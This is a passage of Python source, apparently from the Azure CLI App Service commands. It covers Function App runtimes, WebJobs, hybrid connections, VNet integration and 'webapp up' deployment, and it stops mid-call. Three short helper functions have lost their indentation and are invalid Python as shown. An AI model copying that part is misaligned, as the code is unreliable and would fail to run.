    extension_version = _get_extension_version_functionapp(functions_version)
    return [version_json
            for version_json in runtime_json[keys.PROPERTIES][keys.MAJOR_VERSIONS]
            if extension_version in version_json[keys.SUPPORTED_EXTENSION_VERSIONS]]
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
    """Pick the runtime major-version entry to use.

    When *runtime_version* is given, return the entry whose display version
    matches it and which supports the requested extension version (else None).
    Otherwise return the highest-versioned entry flagged as default among the
    supported versions (an empty dict when none is flagged).
    """
    keys = FUNCTIONS_STACKS_API_KEYS()
    extension_version = _get_extension_version_functionapp(functions_version)
    if runtime_version:
        for candidate in runtime_json[keys.PROPERTIES][keys.MAJOR_VERSIONS]:
            display_matches = candidate[keys.DISPLAY_VERSION] == runtime_version
            if display_matches and extension_version in candidate[keys.SUPPORTED_EXTENSION_VERSIONS]:
                return candidate
        return None
    # No explicit version requested: choose the newest entry marked default.
    best_json = {}
    best_version = 0.0
    for candidate in _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
        if not candidate[keys.IS_DEFAULT]:
            continue
        version = _get_runtime_version_functionapp(candidate[keys.RUNTIME_VERSION], is_linux)
        if not best_json or best_version < version:
            best_json = candidate
            best_version = version
    return best_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
    """Parse a runtime version string into a float for ordering/comparison."""
    import re
    # NOTE(review): is_linux is currently unused — both OS patterns are always
    # tried, Windows first; confirm whether that is intentional.
    for pattern in (FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
                    FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX):
        matched = re.fullmatch(pattern, version_string)
        if matched:
            return float(matched.group(1))
    return float(version_string)
def try_create_application_insights(cmd, functionapp):
    """Create an Application Insights component named after *functionapp* in its
    resource group and location, then wire the instrumentation key into the
    app's settings. Logs a warning (and returns) on failure."""
    creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
                           'Please use the Azure Portal to manually create and configure the Application Insights, ' \
                           'if needed.'
    ai_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
    component = ai_client.components.create_or_update(
        functionapp.resource_group,
        functionapp.name,
        {
            "name": functionapp.name,
            "location": functionapp.location,
            "kind": "web",
            "properties": {
                "Application_Type": "web"
            }
        })
    if component is None or component.instrumentation_key is None:
        logger.warning(creation_failed_warn)
        return
    # Emit the success message on the warning channel so it does not interfere
    # with regular JSON output on stdout.
    logger.warning('Application Insights \"%s\" was created for this Function App. '
                   'You can visit https://portal.azure.com/#resource%s/overview to view your '
                   'Application Insights component', component.name, component.id)
    update_app_settings(cmd, functionapp.resource_group, functionapp.name,
                        ['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(component.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
                             deployment_source_branch='master', deployment_local_git=None):
    """Hook up source control for *webapp*: an external git URL (manual
    integration) and/or the Kudu local-git endpoint."""
    if deployment_source_url:
        logger.warning("Linking to git repository '%s'", deployment_source_url)
        try:
            config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
                                  deployment_source_branch, manual_integration=True)
        except Exception as ex:  # pylint: disable=broad-except
            # Linking is best-effort: surface the error but keep going.
            logger.warning("Link to git repository failed due to error '%s'",
                           ex_handler_factory(no_throw=True)(ex))
    if deployment_local_git:
        local_git_info = enable_local_git(cmd, resource_group_name, name)
        logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
        setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
    """Validate a storage account (endpoints and SKU) and build its connection string.

    *storage_account* may be a plain account name (assumed to live in
    *resource_group_name*) or a full ARM resource ID. Raises CLIError when an
    endpoint is missing or the SKU is not a supported type.
    """
    sa_resource_group = resource_group_name
    if is_valid_resource_id(storage_account):
        parsed = parse_resource_id(storage_account)
        sa_resource_group = parsed['resource_group']
        storage_account = parsed['name']
    storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
    storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
                                                                        storage_account)
    endpoints = storage_properties.primary_endpoints
    sku = storage_properties.sku.name
    allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
    error_message = ''
    # Functions requires blob, queue and table endpoints to all be enabled.
    for e in ['blob', 'queue', 'table']:
        if not getattr(endpoints, e, None):
            error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e)  # pylint: disable=line-too-long
    if sku not in allowed_storage_types:
        error_message += 'Storage type {} is not allowed'.format(sku)
    if error_message:
        raise CLIError(error_message)
    obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account)  # pylint: disable=no-member
    try:
        keys = [obj.keys[0].value, obj.keys[1].value]  # pylint: disable=no-member
    except AttributeError:
        # Older API versions have a slightly different structure
        keys = [obj.key1, obj.key2]  # pylint: disable=no-member
    return 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
        "https",
        cli_ctx.cloud.suffixes.storage_endpoint,
        storage_account,
        keys[0])  # pylint: disable=no-member
def list_consumption_locations(cmd):
    """List regions that support the consumption (Dynamic) hosting plan."""
    regions = web_client_factory(cmd.cli_ctx).list_geo_regions(sku='Dynamic')
    result = []
    for region in regions:
        result.append({'name': region.name.lower().replace(' ', '')})
    return result
def list_locations(cmd, sku, linux_workers_enabled=None):
    """List locations supporting the given SKU, intersected with the locations
    registered for the Microsoft.Web 'sites' resource type."""
    web_client = web_client_factory(cmd.cli_ctx)
    geo_regions = web_client.list_geo_regions(sku=get_sku_name(sku),
                                              linux_workers_enabled=linux_workers_enabled)
    providers_client = providers_client_factory(cmd.cli_ctx)
    site_locations = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
    for resource_type in site_locations:
        if resource_type.resource_type == 'sites':
            site_locations = resource_type.locations
            break
    return [geo_region for geo_region in geo_regions if geo_region.name in site_locations]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
    """Poll the Kudu deployment-status endpoint until a zip deploy finishes.

    Polls every 2 seconds, for at most *timeout* seconds when given (default
    450 trials ~= 15 minutes). Returns the final status payload; raises
    CLIError when the deployment reports failure (status 3) or is still
    running when the polling budget is exhausted.
    """
    import requests
    from azure.cli.core.util import should_disable_connection_verify
    # one trial every 2 seconds; 450 trials by default
    total_trials = (int(timeout) // 2) if timeout else 450
    num_trials = 0
    while num_trials < total_trials:
        time.sleep(2)
        response = requests.get(deployment_status_url, headers=authorization,
                                verify=not should_disable_connection_verify())
        try:
            res_dict = response.json()
        except json.decoder.JSONDecodeError:
            # transient bad payload from the endpoint: treat as empty and retry
            logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
            res_dict = {}
        finally:
            # count the trial whether or not the payload parsed
            num_trials = num_trials + 1
        if res_dict.get('status', 0) == 3:
            # status 3 == failed; enable default logging so the user can inspect why
            _configure_default_logging(cmd, rg_name, name)
            raise CLIError("""Zip deployment failed. {}. Please run the command az webapp log deployment show
                           -n {} -g {}""".format(res_dict, name, rg_name))
        if res_dict.get('status', 0) == 4:
            # status 4 == success
            break
        if 'progress' in res_dict:
            logger.info(res_dict['progress'])  # show only in debug mode, customers seem to find this confusing
    # if the deployment is taking longer than expected
    if res_dict.get('status', 0) != 4:
        _configure_default_logging(cmd, rg_name, name)
        raise CLIError("""Timeout reached by the command, however, the deployment operation
                       is still on-going. Navigate to your scm site to check the deployment status""")
    return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
    """List the continuous WebJobs of an app (or of one of its slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Start a continuous WebJob, then return its refreshed representation."""
    apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
        return apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    apps.start_continuous_web_job(resource_group_name, name, webjob_name)
    return apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Stop a continuous WebJob, then return its refreshed representation."""
    apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
        return apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
    return apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Delete a continuous WebJob from an app or slot."""
    apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    return apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
    """List the triggered WebJobs of an app (or of one of its slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Trigger a run of a triggered WebJob, then return its representation."""
    apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
        return apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
    apps.run_triggered_web_job(resource_group_name, name, webjob_name)
    return apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Delete a triggered WebJob from an app or slot."""
    apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
    return apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
    """List the hybrid connections on an app (or slot), reduced to the fields
    the CLI surfaces. Not supported for Linux apps."""
    if show_webapp(cmd, resource_group_name, name, slot).reserved:
        return logger.warning("hybrid connections not supported on a linux app.")
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
    else:
        listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)

    def _prune(entry):
        # Keep only the fields worth showing; the resource group is segment 4
        # of the ARM resource id.
        props = entry["properties"]
        return {
            "id": entry["id"],
            "location": entry["location"],
            "name": entry["name"],
            "properties": {
                "hostname": props["hostname"],
                "port": props["port"],
                "relayArmUri": props["relayArmUri"],
                "relayName": props["relayName"],
                "serviceBusNamespace": props["serviceBusNamespace"],
                "serviceBusSuffix": props["serviceBusSuffix"]
            },
            "resourceGroup": entry["id"].split("/")[4],
            "type": entry["type"]
        }

    return [_prune(entry) for entry in listed_vals.additional_properties["value"]]
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
    """Bind a Relay hybrid connection to an app (or slot).

    Resolves the Relay namespace, ensures a 'defaultSender' authorization rule
    with Send rights exists, then creates/updates the hybrid connection on the
    webapp and returns a pruned summary dict. Not supported for Linux apps.
    """
    HybridConnection = cmd.get_models('HybridConnection')
    linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
    is_linux = linux_webapp.reserved
    if is_linux:
        return logger.warning("hybrid connections not supported on a linux app.")
    web_client = web_client_factory(cmd.cli_ctx)
    hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    # find the ARM id of the requested Relay namespace
    hy_co_id = ''
    for n in namespace_client.list():
        if n.name == namespace:
            hy_co_id = n.id
    # pull the resource group out of the namespace id (segment after "resourceGroups")
    i = 0
    hy_co_resource_group = ''
    hy_co_split = hy_co_id.split("/")
    for z in hy_co_split:
        if z == "resourceGroups":
            hy_co_resource_group = hy_co_split[i + 1]
        i = i + 1
    # calling the relay API to get information about the hybrid connection
    hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
    # if the hybrid connection does not have a default sender authorization
    # rule, create it
    hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
    has_default_sender_key = False
    for r in hy_co_rules:
        if r.name.lower() == "defaultsender":
            for z in r.rights:
                if z == z.send:
                    has_default_sender_key = True
    if not has_default_sender_key:
        rights = [AccessRights.send]
        hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
                                                         "defaultSender", rights)

    hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
    hy_co_info = hy_co.id
    # the target endpoint (host:port) lives in the connection's user metadata
    hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = ''
    for x in hy_co_metadata:
        if x["key"] == "endpoint":
            hy_co_hostname = x["value"]

    hostname_parts = hy_co_hostname.split(":")
    hostname = hostname_parts[0]
    port = hostname_parts[1]
    id_parameters = hy_co_info.split("/")

    # populate object with information from the hybrid connection, and set it
    # on webapp
    hc = HybridConnection(service_bus_namespace=id_parameters[8],
                          relay_name=hybrid_connection,
                          relay_arm_uri=hy_co_info,
                          hostname=hostname,
                          port=port,
                          send_key_name="defaultSender",
                          send_key_value=hy_co_keys.primary_key,
                          service_bus_suffix=".servicebus.windows.net")
    if slot is None:
        return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
                                                                           hybrid_connection, hc)
    else:
        return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
                                                                               hybrid_connection, hc, slot)

    # reformats hybrid connection, to prune unnecessary fields
    resourceGroup = return_hc.id.split("/")
    mod_hc = {
        "hostname": return_hc.hostname,
        "id": return_hc.id,
        "location": return_hc.additional_properties["location"],
        "name": return_hc.name,
        "port": return_hc.port,
        "relayArmUri": return_hc.relay_arm_uri,
        "resourceGroup": resourceGroup[4],
        "serviceBusNamespace": return_hc.service_bus_namespace,
        "serviceBusSuffix": return_hc.service_bus_suffix
    }
    return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
    """Switch every app on *plan* that uses the hybrid connection to the
    primary or secondary 'defaultSender' key.

    key_type must be 'primary' or 'secondary' (case-insensitive); anything
    else logs a warning and returns None. Returns the list of apps using the
    hybrid connection after the update.
    """
    HybridConnection = cmd.get_models('HybridConnection')
    web_client = web_client_factory(cmd.cli_ctx)

    # extract the hybrid connection resource group from its relay ARM URI
    asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
                                                                   namespace, hybrid_connection)
    arm_uri = asp_hy_co.relay_arm_uri
    split_uri = arm_uri.split("resourceGroups/")
    resource_group_strings = split_uri[1].split('/')
    relay_resource_group = resource_group_strings[0]

    hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    # calling the relay function to obtain information about the hc in question
    hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)

    # if the hybrid connection does not have a default sender authorization
    # rule, create it
    hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
    has_default_sender_key = False
    for r in hy_co_rules:
        if r.name.lower() == "defaultsender":
            for z in r.rights:
                if z == z.send:
                    has_default_sender_key = True
    if not has_default_sender_key:
        rights = [AccessRights.send]
        hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
                                                         "defaultSender", rights)

    hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
    # the target endpoint (host:port) lives in the connection's user metadata
    hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    # NOTE(review): initialized to 0 here but to '' in add_hc; if no 'endpoint'
    # metadata entry exists the split below fails in either case — confirm the
    # metadata always carries an endpoint.
    hy_co_hostname = 0
    for x in hy_co_metadata:
        if x["key"] == "endpoint":
            hy_co_hostname = x["value"]

    hostname_parts = hy_co_hostname.split(":")
    hostname = hostname_parts[0]
    port = hostname_parts[1]

    # select the requested key; "empty" is a sentinel for an invalid key_type
    key = "empty"
    if key_type.lower() == "primary":
        key = hy_co_keys.primary_key
    elif key_type.lower() == "secondary":
        key = hy_co_keys.secondary_key
    # ensure the requested key type was valid
    if key == "empty":
        logger.warning("Key type is invalid - must be primary or secondary")
        return

    apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
                                                                           hybrid_connection)
    # changes the key for every app that uses that hybrid connection
    for x in apps:
        app_info = ast.literal_eval(x)
        app_name = app_info["name"]
        app_id = app_info["id"]
        id_split = app_id.split("/")
        app_resource_group = id_split[4]
        hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
                              relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
                              send_key_value=key)
        web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
                                                     hybrid_connection, hc)

    return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
                                                                           namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
    """List the virtual-network connections of an App Service plan."""
    return web_client_factory(cmd.cli_ctx).app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
    """Remove a hybrid connection from an app or slot (not supported on Linux)."""
    linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
    if linux_webapp.reserved:
        return logger.warning("hybrid connections not supported on a linux app.")
    apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot is None:
        return apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
    return apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
                                              hybrid_connection, slot)
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
    """List an app's (or slot's) VNet integrations, trimmed to the fields the
    CLI surfaces and with GUID prefixes stripped from names and ids."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
    else:
        result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
    mod_list = []
    for entry in result:
        # The service prefixes the connection name with a GUID and an
        # underscore; strip it from both the name and the id's last segment.
        long_name = entry.name
        short_name = long_name.split('_', 1)[1] if '_' in long_name else long_name
        v_id = entry.id
        short_id = v_id.rsplit('/', 1)[0] + '/' + short_name
        mod_list.append({"certThumbprint": entry.cert_thumbprint,
                         "id": short_id,
                         "location": entry.additional_properties["location"],
                         "name": short_name,
                         "resourceGroup": v_id.split('/')[4],
                         "routes": entry.routes,
                         "type": entry.type,
                         "vnetResourceId": entry.vnet_resource_id})
    return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
    """Integrate an app (or slot) with a subnet via Swift VNet integration.

    *vnet* may be a name or a full resource ID. Ensures the subnet is
    delegated to Microsoft.Web/serverFarms before creating the connection, and
    returns a pruned summary of the resulting connection.
    """
    SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
    Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
    client = web_client_factory(cmd.cli_ctx)
    vnet_client = network_client_factory(cmd.cli_ctx)
    # resolve the vnet by name or id across the whole subscription
    list_all_vnets = vnet_client.virtual_networks.list_all()
    vnets = []
    for v in list_all_vnets:
        if vnet in (v.name, v.id):
            vnet_details = parse_resource_id(v.id)
            vnet_resource_group = vnet_details['resource_group']
            vnets.append((v.id, v.name, vnet_resource_group))
    if not vnets:
        return logger.warning("The virtual network %s was not found in the subscription.", vnet)
    # If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
    found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
    if not found_vnet:
        found_vnet = [vnets[0]]
    (vnet_id, vnet, vnet_resource_group) = found_vnet[0]
    if len(vnets) > 1:
        logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
                       "To use a different virtual network, specify the virtual network resource ID using --vnet.",
                       vnet, vnet_id)
    if slot is None:
        swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
    else:
        swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
                                                                                          name, slot)
    # check to see if the connection would be supported
    if swift_connection_info.swift_supported is not True:
        return logger.warning("""Your app must be in an Azure App Service deployment that is
              capable of scaling up to Premium v2\nLearn more:
              https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")

    subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
    delegations = subnetObj.delegations
    delegated = False
    for d in delegations:
        if d.service_name.lower() == "microsoft.web/serverfarms".lower():
            delegated = True
    if not delegated:
        # delegate the subnet to App Service before connecting
        subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
        vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
                                             subnet_parameters=subnetObj)

    id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
    subnet_resource_id = id_subnet.id
    swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
                                    swift_supported=True)
    if slot is None:
        return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
                                                                                        swiftVnet)
    else:
        return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
                                                                                             swiftVnet, slot)

    # reformats the vnet entry, removing unecessary information
    id_strings = return_vnet.id.split('/')
    resourceGroup = id_strings[4]
    mod_vnet = {
        "id": return_vnet.id,
        "location": return_vnet.additional_properties["location"],
        "name": return_vnet.name,
        "resourceGroup": resourceGroup,
        "subnetResourceId": return_vnet.subnet_resource_id
    }
    return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
    """Delete the Swift VNet integration from an app or slot."""
    apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot is None:
        return apps.delete_swift_virtual_network(resource_group_name, name)
    return apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Return the run history of a triggered WebJob on an app or slot."""
    apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
    return apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, dryrun=False, logs=False,  # pylint: disable=too-many-statements,
              launch_browser=False, html=False):
    """Create (or reuse) the resource group, plan and webapp for the sources in
    the current directory, then zip-deploy them.

    Fix: the OS-mismatch error previously passed the ``os`` module as the last
    format argument (rendering "<module 'os' ...>"); it now passes the
    detected ``os_name``.
    """
    import os
    AppServicePlan = cmd.get_models('AppServicePlan')
    src_dir = os.getcwd()
    _src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
    client = web_client_factory(cmd.cli_ctx)
    user = get_profile_username()
    _create_new_rg = False
    _site_availability = get_site_availability(cmd, name)
    _create_new_app = _site_availability.name_available
    os_name = detect_os_form_src(src_dir, html)
    lang_details = get_lang_from_content(src_dir, html)
    language = lang_details.get('language')
    # detect the version
    data = get_runtime_version_details(lang_details.get('file_loc'), language)
    version_used_create = data.get('to_create')
    detected_version = data.get('detected')
    runtime_version = "{}|{}".format(language, version_used_create) if \
        version_used_create != "-" else version_used_create
    site_config = None
    if not _create_new_app:  # App exists, or App name unavailable
        if _site_availability.reason == 'Invalid':
            raise CLIError(_site_availability.message)
        # Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
        logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
        app_details = get_app_details(cmd, name)
        if app_details is None:
            raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
                           "is a part of the current subscription".format(name))
        current_rg = app_details.resource_group
        if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
            raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
                           "match the value entered '{}'. Please re-run command with the "
                           "correct parameters.". format(name, current_rg, resource_group_name))
        rg_name = resource_group_name or current_rg
        if location is None:
            loc = app_details.location.replace(" ", "").lower()
        else:
            loc = location.replace(" ", "").lower()
        plan_details = parse_resource_id(app_details.server_farm_id)
        current_plan = plan_details['name']
        if plan is not None and current_plan.lower() != plan.lower():
            raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
                           "Please check if you have configured defaults for plan name and re-run command."
                           .format(plan, current_plan))
        plan = plan or plan_details['name']
        plan_info = client.app_service_plans.get(rg_name, plan)
        sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
        current_os = 'Linux' if plan_info.reserved else 'Windows'
        # Raise error if current OS of the app is different from the current one
        if current_os.lower() != os_name.lower():
            # BUG FIX: last argument was the `os` module, not the detected OS name
            raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
                           "'{}'. "
                           "Please create a new app to continue this operation.".format(name, current_os, src_dir,
                                                                                        os_name))
        _is_linux = plan_info.reserved
        # for an existing app check if the runtime version needs to be updated
        # Get site config to check the runtime version
        site_config = client.web_apps.get_configuration(rg_name, name)
    else:  # need to create new app, check if we need to use default RG or use user entered values
        logger.warning("The webapp '%s' doesn't exist", name)
        sku = get_sku_to_use(src_dir, html, sku)
        loc = set_location(cmd, sku, location)
        rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
        _is_linux = os_name.lower() == 'linux'
        _create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
        plan = get_plan_to_use(cmd=cmd,
                               user=user,
                               os_name=os_name,
                               loc=loc,
                               sku=sku,
                               create_rg=_create_new_rg,
                               resource_group_name=rg_name,
                               plan=plan)
    dry_run_str = r""" {
            "name" : "%s",
            "appserviceplan" : "%s",
            "resourcegroup" : "%s",
            "sku": "%s",
            "os": "%s",
            "location" : "%s",
            "src_path" : "%s",
            "runtime_version_detected": "%s",
            "runtime_version": "%s"
            }
            """ % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
                   runtime_version)
    create_json = json.loads(dry_run_str)

    if dryrun:
        logger.warning("Web app will be created with the below configuration,re-run command "
                       "without the --dryrun flag to create & deploy a new app")
        return create_json

    if _create_new_rg:
        logger.warning("Creating Resource group '%s' ...", rg_name)
        create_resource_group(cmd, rg_name, loc)
        logger.warning("Resource group creation complete")
    # create ASP
    logger.warning("Creating AppServicePlan '%s' ...", plan)
    # we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
    # updated we update those
    create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
                            number_of_workers=1 if _is_linux else None, location=loc)
    if _create_new_app:
        logger.warning("Creating webapp '%s' ...", name)
        create_webapp(cmd, rg_name, name, plan, runtime_version if _is_linux else None,
                      using_webapp_up=True, language=language)
        _configure_default_logging(cmd, rg_name, name)
    else:  # for existing app if we might need to update the stack runtime settings
        if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
            logger.warning('Updating runtime version from %s to %s',
                           site_config.linux_fx_version, runtime_version)
            update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
        elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
            logger.warning('Updating runtime version from %s to %s',
                           site_config.windows_fx_version, runtime_version)
            update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
        create_json['runtime_version'] = runtime_version
    # Zip contents & Deploy
    logger.warning("Creating zip with contents of dir %s ...", src_dir)
    # zip contents & deploy
    zip_file_path = zip_contents_from_dir(src_dir, language)
    enable_zip_deploy(cmd, rg_name, name, zip_file_path)
    # Remove the file after deployment, handling exception if user removed the file manually
    try:
        os.remove(zip_file_path)
    except OSError:
        pass

    if launch_browser:
        logger.warning("Launching app using default browser")
        view_in_browser(cmd, rg_name, name, None, logs)
    else:
        _url = _get_url(cmd, rg_name, name)
        logger.warning("You can launch the app at %s", _url)
        create_json.update({'URL': _url})
    if logs:
        _configure_default_logging(cmd, rg_name, name)
        return get_streaming_log(cmd, rg_name, name)
    # persist convenient defaults for subsequent commands
    with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
        cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
        cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
        cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
        cmd.cli_ctx.config.set_value('defaults', 'location', loc)
        cmd.cli_ctx.config.set_value('defaults', 'web', name)
    return create_json
def _ping_scm_site(cmd, resource_group, name, instance=None):
    """Wake up the Kudu (SCM) site by issuing an authenticated GET against it."""
    import requests
    import urllib3
    from azure.cli.core.util import should_disable_connection_verify
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
    scm_url = _get_scm_url(cmd, resource_group, name)
    authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
    # Pin the request to a specific scaled-out instance when one was requested.
    cookies = {'ARRAffinity': instance} if instance is not None else {}
    requests.get(scm_url + '/api/settings', headers=authorization,
